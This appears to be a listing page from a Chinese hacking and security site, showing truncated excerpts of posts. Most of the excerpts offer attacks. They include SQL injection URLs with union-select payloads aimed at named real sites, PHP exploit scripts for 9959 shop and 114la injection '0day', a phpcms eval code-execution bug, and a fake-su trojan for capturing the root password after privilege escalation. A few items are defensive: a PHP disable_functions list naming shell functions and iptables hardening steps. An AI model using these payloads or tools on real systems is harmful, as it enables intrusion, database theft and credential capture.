phpcms v9 后台的一个(sql inj)2(code exec)漏洞
phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞 function string2array($data) { if($data == '') return array(); eval("\$array = $data;"); return $array; } 比如投票结果统计(需要后台权限) /moudles/vo...
提权后获取linux root密码
在webbackdoor本身是root(可能性小的可怜)或通过某漏洞溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处。查询了一下前辈的方法,一个是欺骗su记录密码,另外一个是替换sshd,我们先看看欺骗su记录密码的代码吧! 先看第一种,kpr-fakesu.c V0.9beta167 fucksu.c /* * kpr-fakesu.c V0.9beta167 ;P * by...
9959网店系统v5.0 SQL盲注漏洞
以下是利用工具: <?php print_r(‘ +—————————————————————————+ 9959网店系统 v5.0 Blind SQL injection exploit by mendou 05 官方网站: www.9959shop.com +—————————————————————————+ ‘); if ($argc < 2) { print_r(‘ +———...
著名实时评论系统Disqus SQL注入漏洞及修复
Disqus是世界著名的实时评论系统,如果对其不了解,可以自己Google一下 好吧,其实这漏洞太弱了 其实就是news.php对id值没过滤。看实例吧: https://www.webshell.cc/news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8+from+information_schem...
品道网某页面存在伪静态盲注漏洞及修复方案
这是一个伪静态盲注点root权限 可查看所有数据库信息~~ 详细说明: 这是一个盲注点root权限 可查看所有数据库信息 获取数据库用户 http://pai.pindao.com/match/api/share/id/630 and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(user as...
美国国家安全局负责索尼PSN网络安全
据悉,索尼今日正式创建了新的首席电脑保全人员,由前美国国家安全局 局长Philip Reitinger负责,总部就设在华盛顿。“当今网络安全问题已经非常 重要,”索尼官方发言人说道。” 自PSN骇客攻击之后,索尼新增了超过300 万新PSN用户。 (本资讯“前美国国家安全局局长负责索尼PSN网络安全”内容 代表作者个人观点,与华龙网无关。) 据悉,索尼今日正式创建了新的首席电脑保全人员,由前...
虚拟主机配置建议禁止的不安全php函数列表
禁用不安全的PHP函数,有些php函数是不够安全的,我们必须要加强安全配置,如果做虚拟主机,建议禁止php函数列表如下: disable_functions = system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, s...
VPS的简单安全措施三步曲(linux版)
一、开防火墙 开防火墙,不用的端口都禁止掉 /etc/init.d/iptables start //简单的规则如下所示,具体的大家根据情况自己变通 /sbin/iptables -F /sbin/iptables -A INPUT -p tcp -i vnet0 –dport ssh -j ACCEPT /sbin/iptables -A INPUT -p tcp -i vnet0 –dport...
114啦注入0day批量
<?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2011.04.02 Usage: php '.$argv[0].' host /path Example: php '.$argv[0].' ...
aspcms建站系统注入0day
aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且 支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。 漏洞文件:/plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名EXP: https://www.webshell.cc/plug/productbuy.asp?id=2...